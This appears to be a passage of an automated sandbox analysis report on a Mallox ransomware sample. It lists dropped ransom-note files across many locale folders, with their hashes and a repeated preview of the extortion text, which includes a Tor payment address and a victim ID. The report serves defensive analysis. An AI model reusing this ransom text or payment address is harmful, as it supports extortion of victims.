                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\mk-MK\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\ms-BN\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\ms-MY\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\nb-NO\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\nl-BE\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\nl-NL\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\pl-PL\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\pt-BR\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\pt-PT\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\ro-MD\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\ro-RO\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\ru-RU\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\sk-SK\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\sl-SI\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\sq-AL\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\sr-Cyrl-BA\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\sr-Cyrl-ME\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\sr-Cyrl-RS\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\sr-Latn-BA\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
